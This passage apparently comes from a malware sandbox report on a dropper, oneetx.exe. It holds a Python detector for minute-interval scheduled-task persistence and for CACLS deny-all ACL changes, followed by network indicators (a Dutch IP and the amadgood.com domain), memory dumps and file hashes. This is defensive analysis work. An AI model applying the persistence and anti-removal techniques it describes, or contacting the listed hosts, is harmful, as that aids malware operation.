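    if o.get("CREATE") is not True or str(o.get("SC", "")).upper() != "MINUTE":
        return None
    tr = str(o.get("TR", ""))
    if not any(marker in tr.lower() for marker in USER_WRITABLE):
        return None
    return f"schtasks: every {o.get('MO', '?')} min run {tr} (task {o.get('TN')})"


def cacls_findings(tokens):
    """Flag 'CACLS <target> /P <user>:N': the ACL is replaced so <user> gets no access,
    which is how the dropper keeps the logged-on user from deleting it."""
    if tokens[0].rsplit("\\", 1)[-1].upper() not in ("CACLS", "CACLS.EXE"):
        return []
    user, _, right = str(parse_switches(tokens).get("P", "")).rpartition(":")
    if right.upper() == "N" and len(tokens) > 1:
        return [f"cacls: deny all access for {user} on {tokens[1]}"]
    return []


def analyse_process_tree(cmdlines):
    """Ordered, deduplicated findings over every command line (the cmd.exe chain and
    its child cacls.exe processes describe the same ACL change, so repeats collapse)."""
    seen, findings = set(), []
    for cmdline in cmdlines:
        for cmd in split_chain(cmdline):
            tokens = tokenize(cmd)
            if not tokens:
                continue
            hit = schtasks_finding(tokens)
            for f in ([hit] if hit else []) + cacls_findings(tokens):
                if f not in seen:
                    seen.add(f)
                    findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in analyse_process_tree(PROCESS_CMDLINES):
        print(finding)
```

On a real host the same logic applies to Sysmon Event ID 1 or EDR process-creation records; the relevant signal is the combination, not either command alone, since administrators legitimately create minute-interval tasks and legitimately edit ACLs, but rarely both on a freshly written executable under %TEMP%.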

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
NL 45.15.156.208:80 45.15.156.208 tcp
NL 45.15.156.208:80 45.15.156.208 tcp
US 8.8.8.8:53 second.amadgood.com udp
US 8.8.8.8:53 208.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/1372-133-0x0000000000740000-0x00000000011E1000-memory.dmp

memory/1372-134-0x00000000031F0000-0x00000000031F1000-memory.dmp

memory/1372-135-0x0000000000740000-0x00000000011E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1372-151-0x0000000000740000-0x00000000011E1000-memory.dmp

memory/2756-153-0x00000000010E0000-0x00000000010E1000-memory.dmp

memory/2756-152-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/2756-154-0x00000000000D0000-0x0000000000B71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\498570331231

MD5 2841eaa48ad70635c173051bc9169e9e
SHA1 13d1c16636def5fdcb586d0e2de10bc20c8b44fc
SHA256 e81f0dc876fec6f0a99575dfa8f9d411fbe3b2ee6431a7bed218658b1daef179
SHA512 73f1d7914d1d9823ded79b99a32fe4af1f2dc4603314303ebc2397a723b52757b646175d031bd7c25317954e1a42b1b20518906bbec4ce10a9dbf6f486583840

memory/2756-169-0x00000000000D0000-0x0000000000B71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1848-172-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/1848-171-0x00000000011E0000-0x00000000011E1000-memory.dmp

memory/1848-174-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/1848-177-0x00000000000D0000-0x0000000000B71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2608-179-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/2608-180-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

memory/2608-181-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/2608-184-0x00000000000D0000-0x0000000000B71000-memory.dmp